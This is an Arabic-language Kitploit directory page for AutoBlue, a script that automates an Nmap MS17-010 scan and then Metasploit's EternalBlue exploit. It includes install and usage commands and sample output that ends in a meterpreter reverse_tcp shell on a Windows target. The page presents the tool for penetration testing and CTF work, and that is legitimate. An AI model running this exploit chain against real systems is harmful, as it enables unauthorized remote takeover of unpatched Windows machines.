Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
autoblue — AutoBlue - أداة استغلال آلية لـ EternalBlue (CVE-2017-0144 / MS17-010) تستخدم Nmap و Metasploit لأغراض الاختراق الأخلاقي، واختبار الاختراق، وتحديات CTF. فقط للاستخدام المصرح به والتعليمي! | Kitploit
أدوات/GitHubGitHub/atithkhawas/autoblue
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالما بعد الاستغلالCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubatithkhawas/autoblue

autoblue

AutoBlue - أداة استغلال آلية لـ EternalBlue (CVE-2017-0144 / MS17-010) تستخدم Nmap و Metasploit لأغراض الاختراق الأخلاقي، واختبار الاختراق، وتحديات CTF. فقط للاستخدام المصرح به والتعليمي!

عرض المستودع
41منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

AUTOBLUE: أداة استغلال EternalBlue الآلية

AUTOBLUE هي أداة أتمتة مصممة لاستغلال ثغرة EternalBlue (CVE-2017-0144) على أجهزة ويندوز. تدمج الأداة قوة Nmap لفحص الثغرات و msfconsole من Metasploit للاستغلال، مما يمكّن المستخدمين من تحديد الأنظمة الضعيفة آلياً وإطلاق استغلال EternalBlue للحصول على وصول عن بُعد إلى الهدف.

صُممت هذه الأداة بشكل أساسي لمحترفي الأمن، ومختبرَي الاختراق، والمخترقين الأخلاقيين الذين يعملون في بيئات خاضعة للرقابة ومصرح بها مثل تحديات التقاط العلم (CTF)، ومهام اختبار الاختراق، أو الإعدادات المختبرية. يسمح AUTOBLUE للمستخدمين باستغلال ثغرة EternalBlue بأقل تدخل يدوي بمجرد إدخال عنوان IP للهدف.

الميزات

  • فحص آلي للثغرات: يستخدم Nmap للبحث عن ثغرة EternalBlue (CVE-2017-0144) على الجهاز الهدف.
  • استغلال سلس: يستفيد من msfconsole من Metasploit لإطلاق استغلال EternalBlue تلقائياً.
  • إعداد بسيط: يتطلب فقط عنوان IP للهدف وبيئة عمل مثبتة عليها Nmap و Metasploit.
  • تقرير النتائج: يُنتج مخرجات تشير إلى نجاح أو فشل محاولة الاستغلال.

جدول المحتويات

  • المتطلبات الأساسية
  • التثبيت
  • الاستخدام
  • كيف يعمل
  • اعتبارات أمنية
  • المساهمة
  • الترخيص
  • الشكر والتقدير
  • إخلاء المسؤولية

المتطلبات الأساسية:

قبل استخدام AUTOBLUE، تأكد من تثبيت الأدوات التالية على جهازك:

Nmap: أداة فحص الشبكات لاكتشاف الأجهزة الضعيفة. Metasploit Framework: منصة اختبار اختراق تتضمن استغلالات لـ EternalBlue.

تثبيت Nmap:

  • على لينكس (قائم على Debian):

انسخ الكود

root@kitploit:~
      sudo apt update

و

root@kitploit:~
      sudo apt install nmap

على ويندوز أو ماك، قم بتحميل Nmap من الموقع الرسمي.

تثبيت Metasploit:

على لينكس (قائم على Debian):

انسخ الكود

root@kitploit:~
      sudo apt update

و

root@kitploit:~
     sudo apt install metasploit-framework
     

على ويندوز أو ماك، قم بتحميل Metasploit من الموقع الرسمي.

التثبيت:

لتثبيت AUTOBLUE، اتبع الخطوات التالية:

  • استنساخ المستودع:

    root@kitploit:~
      git clone https://github.com/AtithKhawas/autoblue.git
    

    و

    root@kitploit:~
         cd autoblue
    

تأكد من تثبيت Nmap و Metasploit بشكل صحيح كمتطلبات أساسية.

  • جعل النص البرمجي قابلاً للتنفيذ:

    root@kitploit:~
    chmod +x autoblue.sh
    

الاستخدام:

AUTOBLUE مصمم لأتمتة فحص واستغلال ثغرة EternalBlue. إليك كيفية استخدامه:

  • تشغيل الأداة

لاستخدام AUTOBLUE، قم بتشغيل الأمر التالي في الطرفية:

انسخ الكود

root@kitploit:~
     ./autoblue.sh 

المخرجات:

root@kitploit:~
     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - أتمتة استغلال EternalBlue
     ********************************************
     ********************************************
     ------------------------من إعداد ATITH KHAWAS
     ============================================
     أدخل عنوان IP للهدف:

سيطلب عنوان IP للهدف وعنوان IP الخاص بك.

مثال

root@kitploit:~
      أدخل عنوان IP للهدف: <عنوان IP للهدف>
      أدخل عنوان IP الخاص بك: <عنوان IP الخاص بك>

بمجرد تشغيل الأداة، ستبدأ المسح باستخدام Nmap:

المخرجات-1

root@kitploit:~
 عنوان IP للهدف: ***.***.**.**
 [+] جاري فحص الهدف بحثاً عن ثغرة MS17-010...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 المضيف نشط (تأخير 0.19 ثانية).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 نتائج نصوص المضيف:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   ثغرة تنفيذ كود عن بُعد في خوادم Microsoft SMBv1 (ms17-010)
 |     الحالة: VULNERABLE
 |     المعرفات:  CVE:CVE-2017-0143
 |     درجة الخطورة: HIGH
 |       توجد ثغرة حرجة لتنفيذ كود عن بُعد في خوادم Microsoft SMBv1
 |        (ms17-010).
 |           
 |     تاريخ الإفصاح: 2017-03-14
 |     المراجع:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 عنوان IP (مضيف واحد نشط) تم مسحه في 2.40 ثانية
 [+] الهدف VULNERABLE (ضعيف) تجاه EternalBlue!

هنا يبدأ العمل الحقيقي، مما يقلل بشكل كبير من العملية المستهلكة للوقت. إذا كان الهدف ضعيفاً، فإنه يطلق تلقائياً Msfconsole ويضبط RHOSTS و PAYLOAD و LHOST و LPORT مع المنفذ الافتراضي 4444.

المخرجات-2

root@kitploit:~
      [+] جاري تشغيل Metasploit...
      [*] لم يتم تكوين حمولة، سيتم استخدام الحمولة الافتراضية windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] بدأ معالج TCP العكسي على ***.***.**.**:4444 

وتعطينا واجهة مترجم Meterpreter للهدف.

المخرجات-3

root@kitploit:~
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

كيف يعمل:

  • فحص نصوص Nmap: تستخدم الأداة أولاً Nmap Script Scan (--script smb-vuln-ms17-010) لاكتشاف ما إذا كان الجهاز الهدف عرضة لاستغلال EternalBlue. تتحقق مما إذا كان المنفذ 445 مفتوحاً وتحاول تحديد ثغرات SMB.
  • استغلال Metasploit: إذا تم العثور على الجهاز الهدف ضعيفاً، يتابع AUTOBLUE إطلاق استغلال EternalBlue باستخدام msfconsole من Metasploit. سيقوم النص البرمجي بتكوين وإرسال الحمولة اللازمة لاستغلال الثغرة.
  • الصدفة العكسية: إذا نجح الاستغلال، سيتم فتح صدفة عكسية لتوفير واجهة سطر أوامر على الجهاز الضحية.
  • التغذية الراجعة: توفر الأداة تغذية راجعة طوال العملية، بما في ذلك ما إذا كان الهدف قد تم استغلاله بنجاح، وتخرج أي معلومات ذات صلة (مثل عنوان IP للصدفة العكسية).

اعتبارات أمنية:

  • الاستخدام القانوني: يجب استخدام هذه الأداة فقط في بيئات مصرح بها. تأكد من أن لديك إذناً صريحاً لاختبار الجهاز الهدف وأنه ليس غير قانوني في منطقتك.
  • إدخال المستخدم: تأكد من إدخال عناوين IP موثوقة فقط في الأداة لمنع إساءة الاستخدام. قد يؤدي تشغيل هذه الأداة على أنظمة غير موثوقة إلى حوادث أمنية.
  • أمان الحمولة: حمولة الصدفة العكسية المستخدمة في هذه الأداة محفوفة بالمخاطر بطبيعتها. لا تعرض جهاز الهجوم أو مستمعاته لشبكات غير موثوقة.
  • تحديث التبعيات: تأكد من تحديث Nmap و Metasploit بانتظام لتخفيف الثغرات الأمنية المعروفة في تلك الأدوات.

المساهمة:

المساهمات في مشروع AUTOBLUE مرحب بها. إذا كان لديك أي اقتراحات أو تحسينات أو إصلاحات للأخطاء، لا تتردد في عمل fork للمستودع وإنشاء طلب سحب.

الترخيص:

هذه الأداة مفتوحة المصدر وموزعة بموجب ترخيص MIT. أنت حر في استخدام وتعديل وتوزيع البرنامج في مشاريعك الخاصة. ومع ذلك، يجب عليك تضمين هذا الإشعار في جميع النسخ أو الأجزاء الجوهرية من البرنامج.

الشكر والتقدير:

  • Nmap: لتوفير وظيفة فحص الثغرات الأساسية.
  • Metasploit: لتوفير الإطار لاستغلال ثغرة EternalBlue.
  • باحثو الأمن: لاكتشاف ثغرة EternalBlue والإفصاح عنها علناً، مما ساعد في تأمين الأنظمة حول العالم.

إخلاء المسؤولية:

AUTOBLUE هي أداة مخصصة للاستخدام التعليمي والأخلاقي فقط. المؤلفون غير مسؤولين عن أي إجراءات غير قانونية تتخذ باستخدام هذه الأداة. من مسؤوليتك التأكد من أن لديك إذناً صريحاً لإجراء اختبارات الاختراق على أي نظام.

استخدم هذه الأداة على مسؤوليتك الخاصة. قم دائماً بتنفيذ أنشطة اختبار الاختراق في بيئة آمنة وقانونية.

تنزيل الأداة